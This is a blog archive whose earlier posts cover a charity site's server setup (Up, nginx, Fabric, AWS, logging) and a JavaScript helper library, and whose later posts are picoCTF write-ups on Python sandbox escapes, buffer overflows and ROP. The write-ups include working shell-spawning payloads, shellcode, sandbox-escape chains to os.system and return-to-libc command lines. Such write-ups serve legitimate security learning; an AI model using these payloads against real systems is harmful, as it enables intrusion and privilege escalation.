Wednesday, May 29, 2013

CharityVid - Server Configuration


In this post, I will focus on how I run and update the CharityVid.org servers, using the following tools: Up, nginx, and Fabric.
Let's start with Up. Up lets us do live reloads of the site while load balancing across several worker processes. This makes the site quite robust and keeps the server from going down: if one worker fails, another just takes over, no problem. Here is how I launch it:
 up -w app.js -p 3100 -n 2 -k -T charityvid  

CharityVid runs on express.js; however, unlike a normal express application, we do not start the server ourselves. Instead we let Up handle it:
 var app = express()  
 ...  
 app.configure('production', function() {  
   module.exports = http.Server(app)  
 })  

Now after launching, Up will watch (-w) app.js for changes, listen on port (-p) 3100 with 2 (-n) workers, respawn workers when they die (-k), and set the process title (-T) to charityvid for the process view. If we want to issue the reload command, we call:
 kill -s SIGUSR2 $(cat /var/run/charityvid.pid)  
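
The same reload can be triggered from a script instead of the shell. Here is a minimal Python 3 sketch, assuming the pid file path from the command above; `read_pid` and `reload_workers` are hypothetical helper names, not part of Up.

```python
import os
import signal


def read_pid(pid_file):
    """Return the process id stored in a pid file as an int."""
    with open(pid_file) as handle:
        return int(handle.read().strip())


def reload_workers(pid_file="/var/run/charityvid.pid"):
    """Send SIGUSR2 to the process in the pid file, like the kill command above."""
    os.kill(read_pid(pid_file), signal.SIGUSR2)
```

Calling `reload_workers()` needs the same permissions as the `kill` command, so it would normally be run with sudo.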

At this point, we have our server running on port 3100. Now we need to expose it to the outside world on port 80. To do this, we will use nginx, which can also provide caching by sitting between our express server and the internet. Here is what a basic nginx config file looks like:
 worker_processes 1;  
 error_log logs/error.log;  
 pid    logs/nginx.pid;  
 events {  
   worker_connections 1024;  
 }  
 http {  
   include    mime.types;  
   default_type application/octet-stream;  
   sendfile    on;  
   keepalive_timeout 65;  
   gzip on;  
 #charityvid.org  
   server {  
     listen    80;  
     server_name charityvid.org www.charityvid.org;  
     location / {  
       proxy_set_header Host $http_host;  
       proxy_http_version 1.1;  
       proxy_set_header Upgrade $http_upgrade;  
       proxy_set_header Connection "upgrade";  
       proxy_pass  http://127.0.0.1:3100;  
     }  
   }  
 }  

If you installed from source, start nginx by calling:
 /usr/local/nginx/sbin/./nginx  

Now nginx acts as a proxy between port 80 and our server on port 3100 for the charityvid hostnames. This is also useful if you want to run multiple apps on one IP (which I do): they can all share port 80, and nginx routes each request by its hostname.
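
To make the hostname routing concrete, here is a small Python 3 sketch of the lookup nginx effectively does with `server_name` and `proxy_pass`. The second app, its hostname, and its port are made up for illustration, and real nginx matching has more rules (wildcards, default servers) than this.

```python
# Hypothetical routing table: one entry per hostname, like one nginx server block each.
UPSTREAMS = {
    "charityvid.org": "http://127.0.0.1:3100",
    "www.charityvid.org": "http://127.0.0.1:3100",
    "otherapp.example": "http://127.0.0.1:3200",  # made-up second app
}


def pick_upstream(host_header):
    """Return the upstream for a Host header, ignoring case and any port suffix."""
    hostname = host_header.split(":")[0].lower()
    return UPSTREAMS.get(hostname)


print(pick_upstream("www.charityvid.org"))
```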

Finally, we want to automate the deployment process. This is what fabric is for. With fabric we can issue commands to our remote server using python. A basic config looks like this:
 from __future__ import with_statement  
 from fabric.api import *  
 def ec2():  
   env.user='ubuntu'  
   env.hosts=['ubuntu@123.123.123.123']  
 def update(app):  
   with cd('/home/'+env.user+'/websites'):  
     if app=="charityvid":  
       run('cd charityvid && git pull')  
       sudo('kill -s SIGUSR2 $(cat /var/run/charityvid.pid)')  
 def nginx():  
   sudo('/usr/local/nginx/sbin/./nginx')  
 def init():  
   start('charityvid')  

We can then issue the update command like so:
 fab ec2 update:charityvid  

This will pull from the git repo (prod branch), and then send the command to Up to update. For more information on the automation used here, reference my blog post on Upstart, which outlines how we can use upstart to daemonize our server process without using screen (or byobu).

Tuesday, May 21, 2013

CharityVid - Prepping for scale


In this post, I will outline how I set up horizontal scaling on AWS EC2 and how I added monitoring tools to watch my servers. I will go over the AWS load balancer, a shared MongoDB database, server monitoring, and error logging.
The AWS load balancer allows you to distribute the load coming to a URL across different servers. It gives you a dynamic DNS name, and requests sent to that name are spread across the servers registered with the balancer. Setting up the AWS load balancer is quite simple, and it even removes the need to host your SSL certificate on the web servers themselves. Instead, you can have the balancer serve the SSL certificate and then forward the decrypted traffic to port 80 on your servers. This is secure as long as we assume an uncompromised local network (and indeed Amazon's internal AWS network isolates instances' networks properly).

The first step to load balancing is to create an AMI (hard disk clone) of your main server. From there, you can spin up multiple cloned instances based on that AMI. These clones can then be brought online, and then added to the load balancer.

Next is the creation of the load balancer. It's quite a simple setup; the key is that your DNS is set up properly. I found it easiest to move my DNS to CloudFlare (which has given me other security benefits as well), and then all you do is create a CNAME record for your domain which points to the dynamic DNS name of the load balancer.

Now, if a server goes down for some reason, the load balancer will automatically stop sending it traffic. It also distributes the load so that you can handle a lot more traffic.
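
Here is a toy Python 3 sketch of that behavior: servers that fail a health check are skipped, and the rest share the traffic. Round robin is an assumption for illustration only; this is not how AWS implements its balancer, and the class name is hypothetical.

```python
import itertools


class RoundRobinBalancer:
    """Hand out servers in turn, skipping any that are marked down."""

    def __init__(self, servers):
        self.servers = list(servers)
        self.healthy = set(self.servers)
        self._cycle = itertools.cycle(self.servers)

    def mark_down(self, server):
        """Record a failed health check for a server."""
        self.healthy.discard(server)

    def mark_up(self, server):
        """Put a known server back into rotation."""
        if server in self.servers:
            self.healthy.add(server)

    def next_server(self):
        """Return the next healthy server, or raise if none are left."""
        for _ in range(len(self.servers)):
            candidate = next(self._cycle)
            if candidate in self.healthy:
                return candidate
        raise RuntimeError("no healthy servers")
```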

There is a problem, however: each server has its own independent MongoDB instance holding all of our users, but we want all the servers to read from the same database. Normally a master database server would be used, but I found it quicker and easier to use the hosted service MongoLab. With MongoLab, we create a database through their interface and then upload our existing database to it:
 mongodump --dbpath /data/db/ --out dump
 mongorestore -h xxx.mongolab.com:xxxx -d charityvid-database -u <user> -p <password> dump

In addition to creating a production shared mongodb instance, I also created a dev clone of the database for testing purposes.

The next step is to set up services which will alert us when the site goes down and will log error events so that we can debug issues later. For basic uptime monitoring we use Pingdom, which pings the site every once in a while and will email us (or alert us through their Android app) when the site has gone offline.

Next we set up New Relic to monitor the whole server. New Relic sets up a daemon which reports things like CPU, RAM, and network usage so that you can make sure that the server is running smoothly (and also you get a free t-shirt).

In addition to full server monitoring, I also use nodefly to monitor the main node.js server process. It tracks response time, the event loop, and heap size. This is useful if we ever encounter response time issues, or any other node.js specific issue which is not readily visible through New Relic. That being said, because I run more than one service on my server, I mostly pay attention to New Relic and only occasionally look at nodefly to make sure response times are low.

Finally, and most importantly, we need to log error events. For this we will use the Loggly service, and the nodejs winston library. For logging, I set up my own log.js file which manages the winston setup and the configuration settings with the winston-loggly plugin. It then exports the winston object so that I can import it in other modules for when I want to log things. My log.js config looks like this:
 var winston = require('winston'),  
   Loggly = require('winston-loggly').Loggly,  
   settings = require('./settings')  
 winston.add(winston.transports.File, { filename: 'charityvid.log' });  
 if(!settings.DEBUG){  
   winston.add(Loggly, {  
     subdomain: 'charityvid',  
     inputToken: settings.LOGGLY_KEY  
   })  
 }  
 //winston.remove(winston.transports.Console);  
 module.exports = winston  
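
For comparison, here is the same idea sketched with Python 3's standard logging module: always log to a file, and only attach the remote handler outside of debug mode. This is a rough analogue, not a port of winston-loggly; `build_logger` and the `remote_handler` parameter are hypothetical.

```python
import logging


def build_logger(log_file, debug, remote_handler=None):
    """Log to a file always; add the remote handler only when not debugging."""
    logger = logging.getLogger("charityvid")
    # Drop handlers from any earlier call so they do not pile up.
    for handler in list(logger.handlers):
        logger.removeHandler(handler)
        handler.close()
    logger.setLevel(logging.DEBUG)
    logger.addHandler(logging.FileHandler(log_file))
    if not debug and remote_handler is not None:
        logger.addHandler(remote_handler)
    return logger
```

Other modules would then call `logging.getLogger("charityvid")` to get the configured logger, much like requiring log.js.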

In order to determine what level to log things at, I generally follow the suggestions in this answer: http://stackoverflow.com/a/186844

And that's it. Just make sure you log everything, so that when something bad happens (and something bad always happens), you can resolve the issue as quickly as possible.

Tuesday, May 14, 2013

Polish.js - Making JavaScript Better


JavaScript is pretty great, but it's not perfect. So I made it better by adding some extra functionality.
(Note: I add 2 global functions, range and zip, because they are amazing; the rest is either scoped under the Polish namespace or added onto the built-in objects.)

Before:
 > Math.min([1,2,3])  
 NaN  
 > Math.randInt(2,10)  
 TypeError: Object #<Object> has no method 'randInt'  
 > range(1,5)  
 ReferenceError: range is not defined  
 > Math.sum([1,2,3])  
 TypeError: Object #<Object> has no method 'sum'
 > [1,2,3][-1]  
 undefined  

After:
  > Math.min([1,2,3])    
  1   
  > Math.randInt(2,10)   
  6   
  > range(1,5)   
  [1, 2, 3, 4]   
  > Math.sum([1,2,3])   
  6   
  > [1,2,3][-1]   
  3   
 > list = [1,2,3,4,5]  
 > list.pop(1) // pops index  
 2  
 > list.remove(2) // removes element  
  [1,3,4,5]  
 > list.insert(2,5)  
 [1,2,5,3,4,5]  

Now, those are just the basics. What would be really great is if we could use Python-style slices:
 > "abcdef".g('-3:-1')  
 'de'  

And wouldn't it also be great if we had access to some of the python itertools methods?
 Polish.combinations([1,2,3],2)  
 Polish.combinationsReplace("abc",2)  
 Polish.permutations([1,2])  
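
For reference, these are the Python 3 originals that the calls above are modeled on. This only shows what Python itself does; the exact shapes Polish.js returns may differ.

```python
from itertools import combinations, combinations_with_replacement, permutations

print("abcdef"[-3:-1])    # the slice behind "abcdef".g('-3:-1')
print(list(range(1, 5)))  # range stops before the end value
print([1, 2, 3][-1])      # negative indices count from the end

print(list(combinations([1, 2, 3], 2)))
print(list(combinations_with_replacement("abc", 2)))
print(list(permutations([1, 2])))
```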

There are a few more goodies in there too; check out the library on GitHub.

Monday, May 6, 2013

Escaping the Python Sandbox

tl;dr
 eval(compile('print key', '<stdin>', 'exec'))
 GET /index.html?a="}+eval("__import__('os').system('/bin/sh')")+{"  
 __builtins__['ww']=().__class__.__base__  
 __builtins__['w']=ww.__subclasses__()  
 __builtins__['y']=w[53].__enter__.__func__  
 __builtins__['a']=y.__globals__['linecache']  
 __builtins__['os']=a.checkcache.__globals__['os']  
 os.system('cat *')
 ().__class__.__base__.__subclasses__()[53].__enter__.__func__.__globals__['linecache'].checkcache.__globals__['os'].system('sh')

This post is a write-up of how I solved the Python problems from picoCTF. Basically, each problem consists of a piece of Python code which takes user input and then evals it. Eval then allows us to get a shell. Let's explore.

 # example1.py  
 x = input("enter something to eval:\n")  
 print "x:",x  

This is python2.7, which means that the proper way to get input is with "raw_input". The issue with "input" is that it eval's the string. That means we can do things like this:
 enter something to eval:  
 2*100  
 x: 200  

But if we try to do something like this:
 enter something to eval:  
 print "hello world"  
 Traceback (most recent call last):  
  File "pytest.py", line 2, in <module>  
   x = input("enter something to eval:\n")  
  File "<string>", line 1  
   print "hello world"  
     ^  
 SyntaxError: invalid syntax  

We get an error. This is because eval evaluates an expression, and print is a statement in Python 2. However, we can get around this limitation by compiling the code in 'exec' mode and passing the result to eval:
 eval(compile('print "hello world"', '<stdin>', 'exec'))  
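
The difference between the two modes is easy to check locally. This sketch is written for Python 3 (so an assignment stands in for the Python 2 print statement), but the eval and compile behavior it shows is the same idea as above.

```python
namespace = {}

# An expression evaluates fine.
print(eval("2*100"))  # prints 200

# A statement is rejected by eval in its default mode.
try:
    eval("y = 5")
except SyntaxError as error:
    print("SyntaxError:", error.msg)

# Compiling in 'exec' mode first lets eval run the statement.
result = eval(compile("y = 5", "<stdin>", "exec"), namespace)
print(result, namespace["y"])  # eval returns None, but y is now set
```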

Now we can run statements. The next step is to list the files in the current directory, which looks like this:
 def listFiles(a, dir, files):  
   print files  
 path.walk(".", listFiles, None)

And then we put it in our special method:
 eval(compile('def listFiles(a, dir, files):\n\tprint files\npath.walk(".",listFiles,None)', '<stdin>', 'exec'))  

And look! We get an error, but it lists all of the files in the directory (specifically 'your_flag_here'). Let's read that file.
 eval(compile('print open("your_flag_here").read()', '<stdin>', 'exec'))  

Ok, that solves python 3. Python 4 is a fair bit easier. Since we get the 'import' function, all we need is to get an eval on "__import__('os').system('/bin/sh')" and we're good to go. After a bit of research on Query Strings, we get this:
 GET /index.html?a="}+eval("__import__('os').system('/bin/sh')")+{"  

Cool, now onto the harder python 5 (this one was by far the most fun). Here is the source:
 #!/usr/bin/python -u
 # task5.py
 from sys import modules
 modules.clear()
 del modules
 _raw_input = raw_input
 _BaseException = BaseException
 _EOFError = EOFError
 __builtins__.__dict__.clear()
 __builtins__ = None
 print 'Get a shell, if you can...'
 while 1:
  try:
   d = {'x':None}
   exec 'x='+_raw_input()[:50] in d
   print 'Return Value:', d['x']
  except _EOFError, e:
   raise e
  except _BaseException, e:
   print 'Exception:', e

The answer to this is the second chunk of code in the tl;dr at the top, but I'm going to explain how I got there. The first thing I did was look up the documentation for exec. Then I went to see what kinds of things I had access to.
 Get a shell, if you can...  
 print "a"  
 Exception: invalid syntax (<string>, line 1)  
 eval("2+2")  
 Exception: name 'eval' is not defined  
 x   
 Return Value: None  
 x.__class__  
 Return Value: <type 'NoneType'>   
 __builtins__  
 Return Value: {}  
 y    
 Exception: name 'y' is not defined  
 __builtins__['y']=1337  
 Return Value: 1337  
 y  
 Return Value: 1337  
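
To see why this works, here is a small Python 3 simulation of the challenge loop. It is an assumption-laden stand-in for task5.py (which is Python 2): every line gets a fresh dict `d`, but the emptied `__builtins__` dict is shared between lines, so anything stored there survives. `run_line` is a hypothetical helper.

```python
def run_line(line, builtins):
    """Run one input line the way the challenge does: truncated, in a fresh dict."""
    d = {"x": None, "__builtins__": builtins}
    exec("x=" + line[:50], d)
    return d["x"]


shared = {}  # stands in for the cleared __builtins__

print(run_line("__builtins__['y']=1337", shared))  # stores y for later lines
print(run_line("y", shared))                       # a later line can read it back
```

Names are looked up in the globals first and then in `__builtins__`, which is why `y` resolves on the second line even though `d` was rebuilt.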

Cool, I can get around the 50 character limit by storing values in __builtins__. Let's dig deeper into that x.__class__ (I didn't get there as quickly as below, but you get the idea. Just use __base__, __bases__, __class__, __mro__, __subclasses__, etc.):
 x.__class__  
 Return Value: <type 'NoneType'>  
 x.__class__.__base__  
 Return Value: <type 'object'>  
 x.__class__.__base__.__subclasses__  
 Return Value: <built-in method __subclasses__ of type object at 0x88cd40>  
 x.__class__.__base__.__subclasses__()  
 Return Value: [<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>,...  

Ok, I have a long list of types there, but now I have to find out if I can use them to get a shell. Some special ones I noticed were: <type 'file'>, <type 'module'>, <type 'zipimport.zipimporter'>. Let's look at file first:
 #setup variable 'w' to access the values  
 __builtins__['ww']=().__class__.__base__  
 __builtins__['w']=ww.__subclasses__()  
 # file  
 w[40]  
 # open a file  
 w[40]('/etc/hosts').read()  
 # write to a file  
 w[40]('test','w').write('test string')  
 Exception: [Errno 13] Permission denied: 'test'  
 # lets try somewhere else  
 w[40]('/tmp/test','w').write('test string')  
 # read it back  
 w[40]('/tmp/test').read()  

Cool. Too bad we don't know the name of the key file (otherwise we could just read it in). Let's look at <type 'module'> next:
 w[47]  
 Return Value: <type 'module'>  
 w[47]('os')  
 Return Value: <module 'os' (built-in)>  
 w[47]('os').system  
 Exception: 'module' object has no attribute 'system'  

Yeah, I tried for a long time, but couldn't get it to create a useful object (calling the module type just creates a new, empty module that happens to be named 'os'). Let's move on to zipimporter. It looks like we should be able to read in a zip file containing a python module. The next step is figuring out how to get a zip onto the server. Remember that we can write arbitrary files to /tmp, and that python can write arbitrary bytes in strings with its \x escape sequence. This means we can do this:
 #the zip file in hex  
 50 4b 03 04 14 03 00 00 08 00 ce ad a4 42 5e 13 60 d0 22 00 00 00 23 00 00 00 04 00 00 00 7a 2e 70 79 cb cc 2d c8 2f 2a 51 c8 2f e6 2a 28 ca cc 03 31 f4 8a 2b 8b 4b 52 73 35 d4 93 13 4b 14 b4 d4 35 b9 00 50 4b 01 02 3f 03 14 03 00 00 08 00 ce ad a4 42 5e 13 60 d0 22 00 00 00 23 00 00 00 04 00 00 00 00 00 00 00 00 00 20 80 a4 81 00 00 00 00 7a 2e 70 79 50 4b 05 06 00 00 00 00 01 00 01 00 32 00 00 00 44 00 00 00 00 00  
 #save it to strings in 7 byte chunks
 __builtins__['a']='\x50\x4b\x03\x04\x14\x03\x00'  
 __builtins__['b']='\x00\x08\x00\xce\xad\xa4\x42'  
 ...  
 __builtins__['t']='\x00\x44\x00\x00\x00\x00\x00'  
 __builtins__['u']=a+b+c+d+e+f+g+h+i+j+k+l+m+n+o  
 __builtins__['v']=u+p+q+r+s+t  
 #write it to a file  
 w[40]('/tmp/z','wb').write(v)  
 #now lets load it in  
 w[49]  
 Return Value: <type 'zipimport.zipimporter'>  
 #and....  
 w[49]('/tmp/z').load_module('z')  
 Exception: can't decompress data; zlib not available  
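
Typing those assignment lines by hand is tedious, so here is a Python 3 sketch that generates them from the raw bytes and checks that each one fits in the 50 character limit. `chunk_assignments` is a hypothetical helper, and it only has 26 single-letter names to hand out, so it handles at most 26 chunks.

```python
import string


def chunk_assignments(payload, size=7, limit=50):
    """Turn bytes into __builtins__['a']='\\x..' lines that fit the input limit."""
    lines = []
    for start in range(0, len(payload), size):
        name = string.ascii_lowercase[start // size]
        escaped = "".join("\\x%02x" % byte for byte in payload[start:start + size])
        line = "__builtins__['%s']='%s'" % (name, escaped)
        assert len(line) <= limit, "line too long for the challenge input"
        lines.append(line)
    return lines


# First 9 bytes of the zip file shown above.
for line in chunk_assignments(b"PK\x03\x04\x14\x03\x00\x00\x08"):
    print(line)
```

With 7 bytes per chunk each line is 48 characters, which is why 7 is the largest chunk size that fits.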

That last part... after all that work... made me... sad. Very sad.
But I had to move on, and get past the fact that they COMPILED PYTHON WITHOUT ZLIB. Next, I tried to just overwrite their file with my own:
 w[40]('task5.py','w').write('z')  
 Exception: [Errno 13] Permission denied: 'task5.py'  

No luck. I then googled around and found this page. The main post seemed like it could work, but was too complicated for me to fully grasp (and also there's a 50 character limit per entry, so it would take forever to input it). What interested me more was the comment:
 TL;DR  
 __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__)  
 import sys; print open(sys.argv[0]).read()  

Hey, I can do that!
 # the class  
 w[53]  
 Return Value: <class 'warnings.catch_warnings'>  
 #and.....  
 w[53]()._module.__builtins__  
 Exception: 'warnings'  

Nope. Not today.
So I kept looking (I was going through the modules by hand for a while, but no luck).
Then I found this script. Huh, that looks interesting. Let's run it on my machine (after reading the source).
 ...
 Examining codecs.IncrementalEncoder
 Looks like codecs.IncrementalEncoder.__init__.__func__.__globals__['__builtins__'] might be builtins
 Examining codecs.IncrementalEncoder()
 ...

Well, as it turns out, those are false positives (they return the local broken __builtins__). I added this to the searching script to have it find fewer false positives:
 from sys import modules  
 modules.clear()  
 del modules  

Now there are fewer results, but still quite a few. Based on the information previously learned from this guy, I realized that the key was to get into an object's '__enter__'. Scrolling through the indices, we see that warnings.catch_warnings (which previously caused an exception) can be accessed through its __enter__ method (without invoking it). This looks quite promising, and using one of the strings from the search, we get this:
 # target, with 50 character max per line  
 # warnings.catch_warnings.__enter__.__func__.__globals__['linecache'].checkcache.__globals__['os']  
 w[53]  
 Return Value: <class 'warnings.catch_warnings'>  
 __builtins__['y']=w[53].__enter__.__func__  
 Return Value: <function __enter__ at 0x7fdf74cfe1b8>  
 y  
 Return Value: <function __enter__ at 0x7fdf74cfe1b8>  
 __builtins__['a']=y.__globals__['linecache']  
 Return Value: <module 'linecache' from '/usr/lib/python2.7/linecache.pyc'>  
 __builtins__['os']=a.checkcache.__globals__['os']  
 Return Value: <module 'os' from '/usr/lib/python2.7/os.pyc'>  
 os.system('sh')  
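
The index 53 is specific to that server's Python build, so on another machine it is safer to look the class up by name. Here is a Python 3 sketch of the same walk (the challenge itself is Python 2.7, where `__func__` is also needed); `find_subclass` and `reachable_modules` are hypothetical helpers, and which modules show up depends on the Python version.

```python
import types
import warnings  # make sure the class exists before we go looking for it


def find_subclass(name):
    """Walk from a tuple up to object, then search its direct subclasses by name."""
    root = ().__class__.__base__
    for cls in root.__subclasses__():
        if cls.__name__ == name:
            return cls
    return None


def reachable_modules(func):
    """List the modules a function can see through its globals."""
    return sorted(key for key, value in func.__globals__.items()
                  if isinstance(value, types.ModuleType))


cls = find_subclass("catch_warnings")
print(cls)
print(reachable_modules(cls.__enter__))
```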

Thank you sir, may I have another?

Buffer Overflows - The Basics

Recently I competed in picoCTF, a hacker CTF game, and thought I would share some of my solutions. The first is how I did the buffer overflow(s). (For those who don't know, a CTF consists of 'flags', which are special strings that you get by exploiting vulnerabilities in programs.)

Let's start with what a basic vulnerable application would look like.
 void function(char *str) {  
   char buffer[16];  
   strcpy(buffer,str);  
 }  
Now let's say we give that function a string which is longer than 16 characters. Instead of throwing an exception, strcpy will happily write the extra bytes past the end of the buffer, over whatever comes next on the stack.

The Stack:
The stack is a contiguous chunk of memory where the program keeps local variables and return addresses. Here's how it looks (remember stacks are last in, first out).
[      return address         ] <-- this is the address to jump to when the function returns, we want to overwrite this
[     saved ebp (address)     ] <-- this takes up memory
[       stack variable         ] <-- this takes up memory
[          buffer[15]           ] <-- this is the 16th character of our input string
[                 ...                 ]
[          buffer[0]             ] <-- our input starts here


So the idea behind a buffer overflow, is to overflow the buffer:
(input: 'AAAA...AAAAEXECUTESHELLCODE')


[           get shell              ] <-- this is the secret sauce
[        0x41414141          ] <-- overwrite garbage
[       0x41414141           ] <-- overwrite garbage
[          0x41414141        ] <-- 4 letter 'A's
[                 ...                  ]
[          0x41414141        ] <-- buffer starts here

Now, before we get to the secret sauce, let's first understand how we're going to write those 'A's to the buffer.
 ./buffer_overflow $(python -c 'print "A"*28')  
I use python, but you can use other languages too.

Ok, so now we have a bunch of A's on the stack. But how do we know how many we need?
To be honest, I'm not super sure. I know that it's a multiple of 4 plus the buffer size (in this case 16). You can guess and check, but for me it's usually buffer size + 12 bytes (12 A's). Sometimes you don't know how large the buffer is (e.g. no source code). In this case, just put in a lot of A's until you're at the sweet spot between a segmentation fault and proper execution. (P.S. this could be over 1000, so guess wisely.)

Alright, now that we have overflowed the buffer with A's, let's look at the secret sauce: shellcode. For picoCTF, we were given shellcode, but that's not always the case.
Here is the shellcode given to us (in hex):
 00000000 31 c0 f7 e9 50 68 2f 2f 73 68 68 2f 62 69 6e 89 |1...Ph//shh/bin.|  
 00000010 e3 50 68 2d 70 69 69 89 e6 50 56 53 89 e1 b0 0b |.Ph-pii..PVS....|  
 00000020 cd 80                       |..|  

When this piece of code gets executed, we get a shell. We want a shell to spawn because the binary is usually setuid to a privileged user, which allows us to read flags from the disk.
The way you add shellcode (the one below is a different shellcode) to your buffer overflow is to put it in an environment variable:
 export EXPLOIT=$(python -c 'print "\x90"*1000+"\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh"')  

Notice the "\x90". This is a NOP (no operation) sled: the CPU executes each NOP by doing nothing and moving on to the next instruction, so execution slides down the sled until it reaches the shellcode. (From what I understand, this lets the memory address be off by a bit and the exploit will still work.)
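
Here is a small Python 3 sketch of why the sled gives us slack. It builds the sled plus payload as bytes and checks whether a guessed address still ends up in the shellcode. The single `\xcc` byte is a placeholder, not real shellcode, and both helper names are hypothetical.

```python
NOP = b"\x90"


def build_sled(shellcode, sled_len=1000):
    """Prefix the shellcode with sled_len NOP bytes."""
    return NOP * sled_len + shellcode


def reaches_shellcode(guess, sled_start, sled_len=1000):
    """True if a jump to `guess` lands in the sled or on the first shellcode byte."""
    return sled_start <= guess <= sled_start + sled_len


payload = build_sled(b"\xcc", sled_len=4)  # placeholder byte instead of shellcode
print(payload)
print(reaches_shellcode(0xbffff688 + 500, 0xbffff688))
```

With a 1000 byte sled, any guess within 1000 bytes past the start of the variable still works.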

Then to find its memory address we have a small C program:
 #include <stdio.h>  
 #include <stdlib.h>  
 int main(int argc, char **argv) {  
 printf("\n%p\n\n", getenv("EXPLOIT"));  
 return(0);  
 }  

If you're on a 64 bit machine it may come out as more than 4 bytes. This means you need to re-compile the C program with the '-m32' flag (makes it 32 bit). (gcc -m32 -o tester tester.c)

You should now have an address like this: 0xbffff688

So now, instead of giving it shellcode directly, we can give the program the address of it in memory.
Addresses are stored in little endian, so we write the bytes in reverse order. The code looks like this:
 ./buffer_overflow $(python -c 'print "A"*28+"\x88\xf6\xff\xbf"')
Notice how it was reversed in 1 byte chunks (2 hex digits). Also notice how python lets us write arbitrary byte values using the "\x00" escape sequence. (You can usually also just write the address a ton of times, e.g. "\x88\xf6\xff\xbf"*200.)
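
Reversing the bytes by hand is error prone, so here is a Python 3 sketch that lets the struct module do it. The `"<I"` format means a little-endian unsigned 32 bit integer; `pack_addr` and `overflow_payload` are hypothetical helper names.

```python
import struct


def pack_addr(address):
    """Pack a 32 bit address into 4 little-endian bytes."""
    return struct.pack("<I", address)


def overflow_payload(padding_len, address):
    """Padding to reach the return address, followed by the new address."""
    return b"A" * padding_len + pack_addr(address)


print(pack_addr(0xbffff688))  # the bytes come out reversed
print(overflow_payload(28, 0xbffff688))
```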

That pretty much covers the basics of buffer overflows, stay tuned for a ROP tutorial (Return Oriented Programming) which can also be used to solve buffer overflow problems.

SPOILER ALERT:
The solution to picoCTF overflow 3 (has elements of ROP):
                                     (overflow) (address of 'shell' function-found with gdb) 
 ./buffer_overflow $(python -c 'print "A"*76   +  "\xf8\x85\x04\x08"')  

and overflow 4:
                         (put shellcode on stack)               (filler)  (the pointer to shellcode - shown in stack trace)  
 ./buffer_overflow_shellcode $(cat shellcode)$(python -c'print "BB"+"A"*40+"\x40\xd5\xff\xff"')  

(alternate solution if not given stack trace):
 export EXPLOIT=$(python -c "print '\x90'*1000")$(cat shellcode)  
 (run environment program above to get its address: 0xffffd433 - Assumes no ASLR)  
 ./buffer_overflow_shellcode $(python -c "print '\x33\xd4\xff\xff'*200")  

and overflow 5 (non-executable memory):
                                                      (overflow) (<system>)     (called) ('/bin/sh' from environment)  
 ./buffer_overflow_shellcode_hard $(python -c 'print "A"*1036+"\x50\x82\xe6\xf7"+"sh;#" +  "\x11\xd8\xff\xff"')  
(Note, the address for '/bin/sh' from gdb was 0xffffd80f and wasn't working, so I just played with the address (increased by 1, then 1 more) until it worked - note also that I used gdb instead of the normal dump program above, as the address was different. This is because the stack got modified slightly during execution (out of our control). The <system> comes from ROP (found with gdb), so stay tuned for more info on that).
gdb looked like this:
 (gdb) break main  
 (gdb) run  
 (gdb) x/s *((char **)environ)  
 0xffffd805:      "EXPLOIT=/bin/sh"  
 (gdb) x/s 0xffffd80d  
 0xffffd80d:      "/bin/sh"  

Update:
Getting environment variables does not always work (ie. overflow 5) so I came up with an alternate solution, using PATH and a string from the binary. Here is what the process looks like:
 mkdir cmd  
 cd cmd  
 echo "cat /problems/stack_overflow_5_0353c1a83cb2fa0d/key" > a  
 chmod +x a  
 export PATH=/home2/user1792/cmd:$PATH  
 cd /problems/stack_overflow_5_0353c1a83cb2fa0d  
 gdb buffer_overflow_shellcode_hard  
 (gdb) break main  
 (gdb) run  
 (gdb) find &system,+999999,"a"  
 >> 0xf7e9e6ab #this is the address we will use  
 >> 0xf7f0fb8e <setpriority+14>  
 >> (cont.)  
                                                     (fill)    (system)          (junk)    ("a" address)
 ./buffer_overflow_shellcode_hard $(python -c 'print "A"*1036+"\x50\x82\xe6\xf7"+"AAAA" +"\xab\xe6\xe9\xf7"')  



Here are some good sources for more information on buffer overflows:
http://insecure.org/stf/smashstack.html
http://security.stackexchange.com/questions/13194/finding-environment-variables-with-gdb-to-exploit-a-buffer-overflow
http://www.lopisec.com/2011/12/smashthestack-io-level-5-writing-my.html
http://raidersec.blogspot.com/2012/10/smash-stack-io-level-3-writeup.html
http://key-basher.blogspot.com/2013/04/smash-stack-level-5.html

ROP (Return Oriented Programming) - The Basics

If you haven't read my blog post on buffer overflows, I recommend you read it to better understand this post. This is based on the CTF competition picoCTF, but should apply to most (basic) ROP problems.

What return oriented programming is all about:
ROP is related to buffer overflows, in that it requires a buffer to overflow. The difference is that ROP is used to bypass certain protection measures that prevent normal buffer overflows. It turns out that a lot of the time, memory in programs is marked as non-executable. This means that we can't just put shellcode on the stack and have it execute; this is where ROP comes in.
Recall the stack:

[      return address         ] <-- this is the address to jump to when the function returns, we want to overwrite this
[     saved ebp (address)     ] <-- this takes up memory
[       stack variable         ] <-- this also takes up memory
[          buffer[15]           ] <-- this is the 16th character of our input string
[                 ...                 ]
[          buffer[0]             ] <-- our input starts here

Now, our goal (as in buffer overflows) is to take control of the stack. At this point, go watch this video: http://codearcana.com/posts/2013/04/28/picoctf-videos.html. It will explain the concept behind how we will need to modify the stack in order to get what we want, and I will show you the code.

Let's walk through ROP 3:
 #undef _FORTIFY_SOURCE  
 #include <stdio.h>  
 #include <stdlib.h>  
 #include <unistd.h>  
 void vulnerable_function() {  
      char buf[128];  
      read(STDIN_FILENO, buf,256);  
 }  
 int main(int argc, char** argv) {
      vulnerable_function();  
      write(STDOUT_FILENO, "Hello, World\n", 13);  
 }  

Ok, so we have a 128 byte buffer. Remember that there is extra stuff above it in the stack, so we need to add some extra bytes to our overflow (12). Our exploit string looks like this:
 cat <(python -c 'print "A"*140') - | ./rop3  

Now let's add a return address. Specifically, let's add the address of the <system> call.
This is what we need to accomplish, written in C, to get a shell:
 system("/bin/sh");  

So we open up the program in gdb and print out the address of system:
 gdb rop3  
 (gdb) break main  
 (gdb) run  
 (gdb) print system  
 $1 = {<text variable, no debug info>} 0xf7e68250 <system>  

Alright, system is at 0xf7e68250, which in escaped little endian looks like: \x50\x82\xe6\xf7.
Now our exploit string looks like this:
 cat <(python -c 'print "\x00"*140+"\x50\x82\xe6\xf7"') - | ./rop3

